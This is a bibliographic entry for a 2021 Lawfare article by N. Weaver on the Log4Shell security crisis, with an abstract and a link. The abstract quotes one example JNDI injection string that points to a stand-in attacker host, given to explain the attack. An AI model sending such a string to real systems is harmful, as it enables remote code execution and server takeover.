What's the Deal with the Log4Shell Security Nightmare?

TitleWhat's the Deal with the Log4Shell Security Nightmare?
Publication TypeWeb Article
Year of Publication2021
AuthorsWeaver, N.
Published inLawfare
Keywordscybersecurity
Abstract

We live in a strange world. What started out as a Minecraft prank, where a message in chat like ${jndi:ldap://attacker.com/pwnyourserver} would take over either a Minecraft server or client, has now resulted in a 5-alarm security panic as administrators and developers all over the world desperately try to fix and patch systems before the cryptocurrency miners, ransomware attackers and nation-state adversaries rush to exploit thousands of software packages. 

URLhttps://www.lawfareblog.com/whats-deal-log4shell-security-nightmareWhat's the Deal with the Log4Shell Security Nightmare?